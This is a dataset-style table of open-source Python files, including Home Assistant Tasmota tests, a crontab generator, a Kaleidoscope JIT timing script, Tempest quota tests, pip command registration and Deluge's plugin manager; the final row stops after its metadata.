repo_name (string, 5-100) | path (string, 4-375) | copies (991 classes) | size (string, 4-7) | content (string, 666-1M) | license (15 classes) |
---|---|---|---|---|---|
turbokongen/home-assistant | tests/components/tasmota/test_mixins.py | 8 | 1574 |
"""The tests for the Tasmota mixins."""
import copy
import json
from unittest.mock import call
from hatasmota.const import CONF_MAC
from hatasmota.utils import config_get_state_online, get_topic_tele_will
from homeassistant.components.tasmota.const import DEFAULT_PREFIX
from .test_common import DEFAULT_CONFIG
from tests.common import async_fire_mqtt_message
async def test_availability_poll_state_once(
hass, mqtt_client_mock, mqtt_mock, setup_tasmota
):
"""Test several entities send a single message to update state."""
config = copy.deepcopy(DEFAULT_CONFIG)
config["rl"][0] = 1
config["rl"][1] = 1
config["swc"][0] = 1
config["swc"][1] = 1
poll_payload_relay = ""
poll_payload_switch = "10"
poll_topic_relay = "tasmota_49A3BC/cmnd/STATE"
poll_topic_switch = "tasmota_49A3BC/cmnd/STATUS"
async_fire_mqtt_message(
hass,
f"{DEFAULT_PREFIX}/{config[CONF_MAC]}/config",
json.dumps(config),
)
await hass.async_block_till_done()
mqtt_mock.async_publish.reset_mock()
# Device online, verify poll for state
async_fire_mqtt_message(
hass,
get_topic_tele_will(config),
config_get_state_online(config),
)
await hass.async_block_till_done()
await hass.async_block_till_done()
await hass.async_block_till_done()
mqtt_mock.async_publish.assert_has_calls(
[
call(poll_topic_relay, poll_payload_relay, 0, False),
call(poll_topic_switch, poll_payload_switch, 0, False),
],
any_order=True,
)
| apache-2.0 |
mmmavis/lightbeam-bedrock-website | bin/crontab/gen-crons.py | 70 | 1205 |
#!/usr/bin/env python
import os
from optparse import OptionParser
from jinja2 import Template
HEADER = '!!AUTO-GENERATED!! Edit bin/crontab/crontab.tpl instead.'
TEMPLATE = open(os.path.join(os.path.dirname(__file__), 'crontab.tpl')).read()
def main():
parser = OptionParser()
parser.add_option('-w', '--webapp',
help='Location of web app (required)')
parser.add_option('-u', '--user',
help=('Prefix cron with this user. '
'Only define for cron.d style crontabs.'))
parser.add_option('-p', '--python', default='/usr/bin/python2.6',
help='Python interpreter to use.')
(opts, args) = parser.parse_args()
if not opts.webapp:
parser.error('-w must be defined')
ctx = {'django': 'cd %s; %s manage.py' % (opts.webapp, opts.python)}
ctx['cron'] = '%s cron' % ctx['django']
if opts.user:
for k, v in ctx.iteritems():
ctx[k] = '%s %s' % (opts.user, v)
# Needs to stay below the opts.user injection.
ctx['python'] = opts.python
ctx['header'] = HEADER
print Template(TEMPLATE).render(**ctx)
if __name__ == '__main__':
main()
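# A minimal usage sketch (hypothetical paths, not part of the original script): the
# crontab.tpl template is expected to reference the context keys built above
# (django, cron, python, header).
#   python bin/crontab/gen-crons.py -w /srv/myapp -u apache > /etc/cron.d/myapp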
| mpl-2.0 |
pspe/root | interpreter/llvm/src/examples/Kaleidoscope/MCJIT/complete/genk-timing.py | 108 | 11103 |
#!/usr/bin/env python
import sys
import random
class TimingScriptGenerator:
"""Used to generate a bash script which will invoke the toy and time it"""
def __init__(self, scriptname, outputname):
self.timeFile = outputname
self.shfile = open(scriptname, 'w')
self.shfile.write("echo \"\" > %s\n" % self.timeFile)
def writeTimingCall(self, filename, numFuncs, funcsCalled, totalCalls):
"""Echo some comments and invoke both versions of toy"""
rootname = filename
if '.' in filename:
rootname = filename[:filename.rfind('.')]
self.shfile.write("echo \"%s: Calls %d of %d functions, %d total\" >> %s\n" % (filename, funcsCalled, numFuncs, totalCalls, self.timeFile))
self.shfile.write("echo \"\" >> %s\n" % self.timeFile)
self.shfile.write("echo \"With MCJIT (original)\" >> %s\n" % self.timeFile)
self.shfile.write("/usr/bin/time -f \"Command %C\\n\\tuser time: %U s\\n\\tsytem time: %S s\\n\\tmax set: %M kb\"")
self.shfile.write(" -o %s -a " % self.timeFile)
self.shfile.write("./toy -suppress-prompts -use-mcjit=true -enable-lazy-compilation=false < %s > %s-mcjit.out 2> %s-mcjit.err\n" % (filename, rootname, rootname))
self.shfile.write("echo \"\" >> %s\n" % self.timeFile)
self.shfile.write("echo \"With MCJIT (lazy)\" >> %s\n" % self.timeFile)
self.shfile.write("/usr/bin/time -f \"Command %C\\n\\tuser time: %U s\\n\\tsytem time: %S s\\n\\tmax set: %M kb\"")
self.shfile.write(" -o %s -a " % self.timeFile)
self.shfile.write("./toy -suppress-prompts -use-mcjit=true -enable-lazy-compilation=true < %s > %s-mcjit-lazy.out 2> %s-mcjit-lazy.err\n" % (filename, rootname, rootname))
self.shfile.write("echo \"\" >> %s\n" % self.timeFile)
self.shfile.write("echo \"With JIT\" >> %s\n" % self.timeFile)
self.shfile.write("/usr/bin/time -f \"Command %C\\n\\tuser time: %U s\\n\\tsytem time: %S s\\n\\tmax set: %M kb\"")
self.shfile.write(" -o %s -a " % self.timeFile)
self.shfile.write("./toy -suppress-prompts -use-mcjit=false < %s > %s-jit.out 2> %s-jit.err\n" % (filename, rootname, rootname))
self.shfile.write("echo \"\" >> %s\n" % self.timeFile)
self.shfile.write("echo \"\" >> %s\n" % self.timeFile)
class KScriptGenerator:
"""Used to generate random Kaleidoscope code"""
def __init__(self, filename):
self.kfile = open(filename, 'w')
self.nextFuncNum = 1
self.lastFuncNum = None
self.callWeighting = 0.1
# A mapping of calls within functions with no duplicates
self.calledFunctionTable = {}
# A list of function calls which will actually be executed
self.calledFunctions = []
# A comprehensive mapping of calls within functions
# used for computing the total number of calls
self.comprehensiveCalledFunctionTable = {}
self.totalCallsExecuted = 0
def updateTotalCallCount(self, callee):
# Count this call
self.totalCallsExecuted += 1
# Then count all the functions it calls
if callee in self.comprehensiveCalledFunctionTable:
for child in self.comprehensiveCalledFunctionTable[callee]:
self.updateTotalCallCount(child)
def updateFunctionCallMap(self, caller, callee):
"""Maintains a map of functions that are called from other functions"""
if not caller in self.calledFunctionTable:
self.calledFunctionTable[caller] = []
if not callee in self.calledFunctionTable[caller]:
self.calledFunctionTable[caller].append(callee)
if not caller in self.comprehensiveCalledFunctionTable:
self.comprehensiveCalledFunctionTable[caller] = []
self.comprehensiveCalledFunctionTable[caller].append(callee)
def updateCalledFunctionList(self, callee):
"""Maintains a list of functions that will actually be called"""
# Update the total call count
self.updateTotalCallCount(callee)
# If this function is already in the list, don't do anything else
if callee in self.calledFunctions:
return
# Add this function to the list of those that will be called.
self.calledFunctions.append(callee)
# If this function calls other functions, add them too
if callee in self.calledFunctionTable:
for subCallee in self.calledFunctionTable[callee]:
self.updateCalledFunctionList(subCallee)
def setCallWeighting(self, weight):
""" Sets the probably of generating a function call"""
self.callWeighting = weight
def writeln(self, line):
self.kfile.write(line + '\n')
def writeComment(self, comment):
self.writeln('# ' + comment)
def writeEmptyLine(self):
self.writeln("")
def writePredefinedFunctions(self):
self.writeComment("Define ':' for sequencing: as a low-precedence operator that ignores operands")
self.writeComment("and just returns the RHS.")
self.writeln("def binary : 1 (x y) y;")
self.writeEmptyLine()
self.writeComment("Helper functions defined within toy")
self.writeln("extern putchard(x);")
self.writeln("extern printd(d);")
self.writeln("extern printlf();")
self.writeEmptyLine()
self.writeComment("Print the result of a function call")
self.writeln("def printresult(N Result)")
self.writeln(" # 'result('")
self.writeln(" putchard(114) : putchard(101) : putchard(115) : putchard(117) : putchard(108) : putchard(116) : putchard(40) :")
self.writeln(" printd(N) :");
self.writeln(" # ') = '")
self.writeln(" putchard(41) : putchard(32) : putchard(61) : putchard(32) :")
self.writeln(" printd(Result) :");
self.writeln(" printlf();")
self.writeEmptyLine()
def writeRandomOperation(self, LValue, LHS, RHS):
shouldCallFunc = (self.lastFuncNum > 2 and random.random() < self.callWeighting)
if shouldCallFunc:
funcToCall = random.randrange(1, self.lastFuncNum - 1)
self.updateFunctionCallMap(self.lastFuncNum, funcToCall)
self.writeln(" %s = func%d(%s, %s) :" % (LValue, funcToCall, LHS, RHS))
else:
possibleOperations = ["+", "-", "*", "/"]
operation = random.choice(possibleOperations)
if operation == "-":
# Don't let our intermediate value become zero
# This is complicated by the fact that '<' is our only comparison operator
self.writeln(" if %s < %s then" % (LHS, RHS))
self.writeln(" %s = %s %s %s" % (LValue, LHS, operation, RHS))
self.writeln(" else if %s < %s then" % (RHS, LHS))
self.writeln(" %s = %s %s %s" % (LValue, LHS, operation, RHS))
self.writeln(" else")
self.writeln(" %s = %s %s %f :" % (LValue, LHS, operation, random.uniform(1, 100)))
else:
self.writeln(" %s = %s %s %s :" % (LValue, LHS, operation, RHS))
def getNextFuncNum(self):
result = self.nextFuncNum
self.nextFuncNum += 1
self.lastFuncNum = result
return result
def writeFunction(self, elements):
funcNum = self.getNextFuncNum()
self.writeComment("Auto-generated function number %d" % funcNum)
self.writeln("def func%d(X Y)" % funcNum)
self.writeln(" var temp1 = X,")
self.writeln(" temp2 = Y,")
self.writeln(" temp3 in")
# Initialize the variable names to be rotated
first = "temp3"
second = "temp1"
third = "temp2"
# Write some random operations
for i in range(elements):
self.writeRandomOperation(first, second, third)
# Rotate the variables
temp = first
first = second
second = third
third = temp
self.writeln(" " + third + ";")
self.writeEmptyLine()
def writeFunctionCall(self):
self.writeComment("Call the last function")
arg1 = random.uniform(1, 100)
arg2 = random.uniform(1, 100)
self.writeln("printresult(%d, func%d(%f, %f) )" % (self.lastFuncNum, self.lastFuncNum, arg1, arg2))
self.writeEmptyLine()
self.updateCalledFunctionList(self.lastFuncNum)
def writeFinalFunctionCounts(self):
self.writeComment("Called %d of %d functions" % (len(self.calledFunctions), self.lastFuncNum))
def generateKScript(filename, numFuncs, elementsPerFunc, funcsBetweenExec, callWeighting, timingScript):
""" Generate a random Kaleidoscope script based on the given parameters """
print "Generating " + filename
print(" %d functions, %d elements per function, %d functions between execution" %
(numFuncs, elementsPerFunc, funcsBetweenExec))
print(" Call weighting = %f" % callWeighting)
script = KScriptGenerator(filename)
script.setCallWeighting(callWeighting)
script.writeComment("===========================================================================")
script.writeComment("Auto-generated script")
script.writeComment(" %d functions, %d elements per function, %d functions between execution"
% (numFuncs, elementsPerFunc, funcsBetweenExec))
script.writeComment(" call weighting = %f" % callWeighting)
script.writeComment("===========================================================================")
script.writeEmptyLine()
script.writePredefinedFunctions()
funcsSinceLastExec = 0
for i in range(numFuncs):
script.writeFunction(elementsPerFunc)
funcsSinceLastExec += 1
if funcsSinceLastExec == funcsBetweenExec:
script.writeFunctionCall()
funcsSinceLastExec = 0
# Always end with a function call
if funcsSinceLastExec > 0:
script.writeFunctionCall()
script.writeEmptyLine()
script.writeFinalFunctionCounts()
funcsCalled = len(script.calledFunctions)
print " Called %d of %d functions, %d total" % (funcsCalled, numFuncs, script.totalCallsExecuted)
timingScript.writeTimingCall(filename, numFuncs, funcsCalled, script.totalCallsExecuted)
# Execution begins here
random.seed()
timingScript = TimingScriptGenerator("time-toy.sh", "timing-data.txt")
dataSets = [(5000, 3, 50, 0.50), (5000, 10, 100, 0.10), (5000, 10, 5, 0.10), (5000, 10, 1, 0.0),
(1000, 3, 10, 0.50), (1000, 10, 100, 0.10), (1000, 10, 5, 0.10), (1000, 10, 1, 0.0),
( 200, 3, 2, 0.50), ( 200, 10, 40, 0.10), ( 200, 10, 2, 0.10), ( 200, 10, 1, 0.0)]
# Generate the code
for (numFuncs, elementsPerFunc, funcsBetweenExec, callWeighting) in dataSets:
filename = "test-%d-%d-%d-%d.k" % (numFuncs, elementsPerFunc, funcsBetweenExec, int(callWeighting * 100))
generateKScript(filename, numFuncs, elementsPerFunc, funcsBetweenExec, callWeighting, timingScript)
print "All done!"
| lgpl-2.1 |
zsoltdudas/lis-tempest | tempest/api/object_storage/test_container_quotas.py | 6 | 4590 |
# Copyright 2013 Cloudwatt
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest.api.object_storage import base
from tempest.common.utils import data_utils
from tempest import config
from tempest.lib import exceptions as lib_exc
from tempest import test
CONF = config.CONF
QUOTA_BYTES = 10
QUOTA_COUNT = 3
class ContainerQuotasTest(base.BaseObjectTest):
"""Attempts to test the perfect behavior of quotas in a container."""
def setUp(self):
"""Creates and sets a container with quotas.
Quotas are set by adding meta values to the container,
and are validated when set:
- X-Container-Meta-Quota-Bytes:
Maximum size of the container, in bytes.
- X-Container-Meta-Quota-Count:
Maximum object count of the container.
"""
super(ContainerQuotasTest, self).setUp()
self.container_name = data_utils.rand_name(name="TestContainer")
self.container_client.create_container(self.container_name)
metadata = {"quota-bytes": str(QUOTA_BYTES),
"quota-count": str(QUOTA_COUNT), }
self.container_client.update_container_metadata(
self.container_name, metadata)
def tearDown(self):
"""Cleans the container of any object after each test."""
self.delete_containers([self.container_name])
super(ContainerQuotasTest, self).tearDown()
@test.idempotent_id('9a0fb034-86af-4df0-86fa-f8bd7db21ae0')
@test.requires_ext(extension='container_quotas', service='object')
@test.attr(type="smoke")
def test_upload_valid_object(self):
"""Attempts to uploads an object smaller than the bytes quota."""
object_name = data_utils.rand_name(name="TestObject")
data = data_utils.arbitrary_string(QUOTA_BYTES)
nbefore = self._get_bytes_used()
resp, _ = self.object_client.create_object(
self.container_name, object_name, data)
self.assertHeaders(resp, 'Object', 'PUT')
nafter = self._get_bytes_used()
self.assertEqual(nbefore + len(data), nafter)
@test.idempotent_id('22eeeb2b-3668-4160-baef-44790f65a5a0')
@test.requires_ext(extension='container_quotas', service='object')
@test.attr(type="smoke")
def test_upload_large_object(self):
"""Attempts to upload an object lagger than the bytes quota."""
object_name = data_utils.rand_name(name="TestObject")
data = data_utils.arbitrary_string(QUOTA_BYTES + 1)
nbefore = self._get_bytes_used()
self.assertRaises(lib_exc.OverLimit,
self.object_client.create_object,
self.container_name, object_name, data)
nafter = self._get_bytes_used()
self.assertEqual(nbefore, nafter)
@test.idempotent_id('3a387039-697a-44fc-a9c0-935de31f426b')
@test.requires_ext(extension='container_quotas', service='object')
@test.attr(type="smoke")
def test_upload_too_many_objects(self):
"""Attempts to upload many objects that exceeds the count limit."""
for _ in range(QUOTA_COUNT):
name = data_utils.rand_name(name="TestObject")
self.object_client.create_object(self.container_name, name, "")
nbefore = self._get_object_count()
self.assertEqual(nbefore, QUOTA_COUNT)
self.assertRaises(lib_exc.OverLimit,
self.object_client.create_object,
self.container_name, "OverQuotaObject", "")
nafter = self._get_object_count()
self.assertEqual(nbefore, nafter)
def _get_container_metadata(self):
resp, _ = self.container_client.list_container_metadata(
self.container_name)
return resp
def _get_object_count(self):
resp = self._get_container_metadata()
return int(resp["x-container-object-count"])
def _get_bytes_used(self):
resp = self._get_container_metadata()
return int(resp["x-container-bytes-used"])
| apache-2.0 |
3dfxsoftware/cbss-addons | lunch/wizard/lunch_cancel.py | 440 | 1274 |
# -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2012 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields, osv
class lunch_cancel(osv.Model):
""" lunch cancel """
_name = 'lunch.cancel'
_description = 'cancel lunch order'
def cancel(self,cr,uid,ids,context=None):
return self.pool.get('lunch.order.line').cancel(cr, uid, ids, context=context)
| gpl-2.0 |
florian-dacosta/OCB | addons/stock_picking_wave/__init__.py | 374 | 1105 |
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import stock_picking_wave
import wizard
import controllers
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
rmcgibbo/scipy | scipy/weave/examples/array3d.py | 100 | 2521 |
""" A simple example to show how to access a 3D numpy array. One
example shows how to access the numpy array using blitz type
converters and the other shows how it can be done without using blitz
by accessing the numpy array data directly.
"""
from __future__ import absolute_import, print_function
import scipy.weave as weave
from scipy.weave import converters
import numpy
def create_array():
"""Creates a simple 3D numpy array with unique values at each
location in the matrix.
"""
rows, cols, depth = 2, 3, 4
arr = numpy.zeros((rows, cols, depth), 'i')
count = 0
for i in range(rows):
for j in range(cols):
for k in range(depth):
arr[i,j,k] = count
count += 1
return arr
def pure_inline(arr):
"""Prints the given 3D array by accessing the raw numpy data and
without using blitz converters.
Notice the following:
1. '\\n' to escape generating a newline in the C++ code.
2. rows, cols = Narr[0], Narr[1].
3. Array access using arr[(i*cols + j)*depth + k].
"""
code = """
int rows = Narr[0];
int cols = Narr[1];
int depth = Narr[2];
for (int i=0; i < rows; i++)
{
for (int j=0; j < cols; j++)
{
printf("img[%3d][%3d]=", i, j);
for (int k=0; k< depth; ++k)
{
printf(" %3d", arr[(i*cols + j)*depth + k]);
}
printf("\\n");
}
}
"""
weave.inline(code, ['arr'])
def blitz_inline(arr):
"""Prints the given 3D array by using blitz converters which
provides a numpy-like syntax for accessing the numpy data.
Notice the following:
1. '\\n' to escape generating a newline in the C++ code.
2. rows, cols = Narr[0], Narr[1].
3. Array access using arr(i, j, k).
"""
code = """
int rows = Narr[0];
int cols = Narr[1];
int depth = Narr[2];
for (int i=0; i < rows; i++)
{
for (int j=0; j < cols; j++)
{
printf("img[%3d][%3d]=", i, j);
for (int k=0; k< depth; ++k)
{
printf(" %3d", arr(i, j, k));
}
printf("\\n");
}
}
"""
weave.inline(code, ['arr'], type_converters=converters.blitz)
def main():
arr = create_array()
print("numpy:")
print(arr)
print("Pure Inline:")
pure_inline(arr)
print("Blitz Inline:")
blitz_inline(arr)
if __name__ == '__main__':
main()
| bsd-3-clause |
patriciolobos/desa8 | openerp/addons/website_certification/__init__.py | 385 | 1030 |
# -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-TODAY OpenERP S.A. <http://www.openerp.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import certification
import controllers
| agpl-3.0 |
cdgallahue/atomic-turbine | web/lib/python2.7/site-packages/pip/commands/__init__.py | 344 | 2244 |
"""
Package containing all pip commands
"""
from __future__ import absolute_import
from pip.commands.completion import CompletionCommand
from pip.commands.download import DownloadCommand
from pip.commands.freeze import FreezeCommand
from pip.commands.hash import HashCommand
from pip.commands.help import HelpCommand
from pip.commands.list import ListCommand
from pip.commands.check import CheckCommand
from pip.commands.search import SearchCommand
from pip.commands.show import ShowCommand
from pip.commands.install import InstallCommand
from pip.commands.uninstall import UninstallCommand
from pip.commands.wheel import WheelCommand
commands_dict = {
CompletionCommand.name: CompletionCommand,
FreezeCommand.name: FreezeCommand,
HashCommand.name: HashCommand,
HelpCommand.name: HelpCommand,
SearchCommand.name: SearchCommand,
ShowCommand.name: ShowCommand,
InstallCommand.name: InstallCommand,
UninstallCommand.name: UninstallCommand,
DownloadCommand.name: DownloadCommand,
ListCommand.name: ListCommand,
CheckCommand.name: CheckCommand,
WheelCommand.name: WheelCommand,
}
commands_order = [
InstallCommand,
DownloadCommand,
UninstallCommand,
FreezeCommand,
ListCommand,
ShowCommand,
CheckCommand,
SearchCommand,
WheelCommand,
HashCommand,
CompletionCommand,
HelpCommand,
]
def get_summaries(ordered=True):
"""Yields sorted (command name, command summary) tuples."""
if ordered:
cmditems = _sort_commands(commands_dict, commands_order)
else:
cmditems = commands_dict.items()
for name, command_class in cmditems:
yield (name, command_class.summary)
def get_similar_commands(name):
"""Command name auto-correct."""
from difflib import get_close_matches
name = name.lower()
close_commands = get_close_matches(name, commands_dict.keys())
if close_commands:
return close_commands[0]
else:
return False
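# For illustration: with the commands_dict defined above, get_similar_commands("instal")
# would typically return "install", while a name with no close match returns False.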
def _sort_commands(cmddict, order):
def keyfn(key):
try:
return order.index(key[1])
except ValueError:
# unordered items should come last
return 0xff
return sorted(cmddict.items(), key=keyfn)
| mit |
altai/altai-api | tests/basic.py | 1 | 4377 |
# vim: tabstop=8 shiftwidth=4 softtabstop=4 expandtab smarttab autoindent
# Altai API Service
# Copyright (C) 2012-2013 Grid Dynamics Consulting Services, Inc
# All Rights Reserved
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program. If not, see
# <http://www.gnu.org/licenses/>.
import sys
import unittest
from flask import g, json
from flask.exceptions import HTTPException
from altai_api import auth
from altai_api import exceptions as exc
from altai_api.main import make_app
class TestCase(unittest.TestCase):
FAKE_AUTH = True
# by default, pretend to be admin
IS_ADMIN = True
def _fake_client_set_factory(self):
class _Fake(object):
master = self
return _Fake()
def install_fake_auth(self, *args_):
if not hasattr(self, 'fake_client_set'):
self.fake_client_set = self._fake_client_set_factory()
g.client_set = self.fake_client_set
g.admin_client_set = self.fake_client_set
g.is_admin = self.IS_ADMIN
g.my_projects = not self.IS_ADMIN
return None
def setUp(self):
super(TestCase, self).setUp()
self.app = make_app(None)
self.app.config['AUDIT_VERBOSITY'] = 0
self.client = self.app.test_client()
if self.FAKE_AUTH:
self.fake_client_set = self._fake_client_set_factory()
self.__require_auth = auth.require_auth
auth.require_auth = self.install_fake_auth
def tearDown(self):
if hasattr(self, 'fake_client_set'):
del self.fake_client_set
if self.FAKE_AUTH:
auth.require_auth = self.__require_auth
def assertAborts(self, status_code, callable_obj, *args, **kwargs):
"""Check that callable raises HTTP exception with given code"""
try:
callable_obj(*args, **kwargs)
except HTTPException, ex:
self.assertEquals(ex.code, status_code,
"Bad HTTP status code: expected %s, got %s"
% (status_code, ex.code))
return ex
except exc.AltaiApiException, ex:
self.assertEquals(ex.status_code, status_code,
"Bad HTTP status code: expected %s, got %s"
% (status_code, ex.status_code))
return ex
else:
self.fail("HTTPException was not raised")
def check_and_parse_response(self, resp, status_code=200,
authenticated=True):
try:
if resp.data:
data = json.loads(resp.data)
else:
data = None
except Exception:
self.fail('Invalid response data: %r' % resp.data)
self.assertEquals(resp.status_code, status_code,
'Expected HTTP response %s but got %s, with: %s' % (
status_code, resp.status_code,
json.dumps(data, indent=4, sort_keys=True)))
self.assertEquals(resp.content_type, 'application/json')
if authenticated:
self.assertTrue('X-GD-Altai-Implementation' in resp.headers)
else:
self.assertTrue('X-GD-Altai-Implementation' not in resp.headers)
if status_code == 204:
self.assertEquals(data, None)
return data
class ContextWrappedTestCase(TestCase):
"""Wraps all tests with request context"""
def setUp(self):
super(ContextWrappedTestCase, self).setUp()
self.__context = self.app.test_request_context()
self.__context.__enter__()
if self.FAKE_AUTH:
self.install_fake_auth()
def tearDown(self):
self.__context.__exit__(*sys.exc_info())
super(ContextWrappedTestCase, self).tearDown()
| lgpl-2.1 |
s0undt3ch/Deluge | deluge/pluginmanagerbase.py | 8 | 7806 |
#
# pluginmanagerbase.py
#
# Copyright (C) 2007 Andrew Resch <[email protected]>
#
# Deluge is free software.
#
# You may redistribute it and/or modify it under the terms of the
# GNU General Public License, as published by the Free Software
# Foundation; either version 3 of the License, or (at your option)
# any later version.
#
# deluge is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with deluge. If not, write to:
# The Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor
# Boston, MA 02110-1301, USA.
#
# In addition, as a special exception, the copyright holders give
# permission to link the code of portions of this program with the OpenSSL
# library.
# You must obey the GNU General Public License in all respects for all of
# the code used other than OpenSSL. If you modify file(s) with this
# exception, you may extend this exception to your version of the file(s),
# but you are not obligated to do so. If you do not wish to do so, delete
# this exception statement from your version. If you delete this exception
# statement from all source files in the program, then also delete it here.
#
#
"""PluginManagerBase"""
import os.path
import logging
import pkg_resources
import deluge.common
import deluge.configmanager
import deluge.component as component
log = logging.getLogger(__name__)
METADATA_KEYS = [
"Name",
"License",
"Author",
"Home-page",
"Summary",
"Platform",
"Version",
"Author-email",
"Description",
]
DEPRECATION_WARNING = """
The plugin %s is not using the "deluge.plugins" namespace.
In order to avoid package name clashes between regular python packages and
deluge plugins, the way deluge plugins should be created has changed.
If you're seeing this message and you're not the developer of the plugin which
triggered this warning, please report it to its author.
If you're the developer, please take a look at the plugins hosted on deluge's
git repository to have an idea of what needs to be changed.
"""
class PluginManagerBase:
"""PluginManagerBase is a base class for PluginManagers to inherit"""
def __init__(self, config_file, entry_name):
log.debug("Plugin manager init..")
self.config = deluge.configmanager.ConfigManager(config_file)
# Create the plugins folder if it doesn't exist
if not os.path.exists(os.path.join(deluge.configmanager.get_config_dir(), "plugins")):
os.mkdir(os.path.join(deluge.configmanager.get_config_dir(), "plugins"))
# This is the entry we want to load..
self.entry_name = entry_name
# Loaded plugins
self.plugins = {}
# Scan the plugin folders for plugins
self.scan_for_plugins()
def enable_plugins(self):
# Load plugins that are enabled in the config.
for name in self.config["enabled_plugins"]:
self.enable_plugin(name)
def disable_plugins(self):
# Disable all plugins that are enabled
for key in self.plugins.keys():
self.disable_plugin(key)
def __getitem__(self, key):
return self.plugins[key]
def get_available_plugins(self):
"""Returns a list of the available plugins name"""
return self.available_plugins
def get_enabled_plugins(self):
"""Returns a list of enabled plugins"""
return self.plugins.keys()
def scan_for_plugins(self):
"""Scans for available plugins"""
base_plugin_dir = deluge.common.resource_filename("deluge", "plugins")
pkg_resources.working_set.add_entry(base_plugin_dir)
user_plugin_dir = os.path.join(deluge.configmanager.get_config_dir(), "plugins")
plugins_dirs = [base_plugin_dir]
for dirname in os.listdir(base_plugin_dir):
plugin_dir = os.path.join(base_plugin_dir, dirname)
pkg_resources.working_set.add_entry(plugin_dir)
plugins_dirs.append(plugin_dir)
pkg_resources.working_set.add_entry(user_plugin_dir)
plugins_dirs.append(user_plugin_dir)
self.pkg_env = pkg_resources.Environment(plugins_dirs)
self.available_plugins = []
for name in self.pkg_env:
log.debug("Found plugin: %s %s at %s",
self.pkg_env[name][0].project_name,
self.pkg_env[name][0].version,
self.pkg_env[name][0].location)
self.available_plugins.append(self.pkg_env[name][0].project_name)
def enable_plugin(self, plugin_name):
"""Enables a plugin"""
if plugin_name not in self.available_plugins:
log.warning("Cannot enable non-existant plugin %s", plugin_name)
return
if plugin_name in self.plugins:
log.warning("Cannot enable already enabled plugin %s", plugin_name)
return
plugin_name = plugin_name.replace(" ", "-")
egg = self.pkg_env[plugin_name][0]
egg.activate()
for name in egg.get_entry_map(self.entry_name):
entry_point = egg.get_entry_info(self.entry_name, name)
try:
cls = entry_point.load()
instance = cls(plugin_name.replace("-", "_"))
except Exception, e:
log.error("Unable to instantiate plugin %r from %r!",
name, egg.location)
log.exception(e)
continue
instance.enable()
if not instance.__module__.startswith("deluge.plugins."):
import warnings
warnings.warn_explicit(
DEPRECATION_WARNING % name,
DeprecationWarning,
instance.__module__, 0
)
if self._component_state == "Started":
component.start([instance.plugin._component_name])
plugin_name = plugin_name.replace("-", " ")
self.plugins[plugin_name] = instance
if plugin_name not in self.config["enabled_plugins"]:
log.debug("Adding %s to enabled_plugins list in config",
plugin_name)
self.config["enabled_plugins"].append(plugin_name)
log.info("Plugin %s enabled..", plugin_name)
def disable_plugin(self, name):
"""Disables a plugin"""
try:
self.plugins[name].disable()
component.deregister(self.plugins[name].plugin)
del self.plugins[name]
self.config["enabled_plugins"].remove(name)
except KeyError:
log.warning("Plugin %s is not enabled..", name)
log.info("Plugin %s disabled..", name)
def get_plugin_info(self, name):
"""Returns a dictionary of plugin info from the metadata"""
info = {}.fromkeys(METADATA_KEYS)
last_header = ""
cont_lines = []
for line in self.pkg_env[name][0].get_metadata("PKG-INFO").splitlines():
if not line:
continue
if line[0] in ' \t' and (len(line.split(":", 1)) == 1 or line.split(":", 1)[0] not in info.keys()):
# This is a continuation
cont_lines.append(line.strip())
else:
if cont_lines:
info[last_header] = "\n".join(cont_lines).strip()
cont_lines = []
if line.split(":", 1)[0] in info.keys():
last_header = line.split(":", 1)[0]
info[last_header] = line.split(":", 1)[1].strip()
return info
| gpl-3.0 |
freeitaly/Trading-System | vn.sgit/pyscript/generate_struct.py | 18 | 1965 |
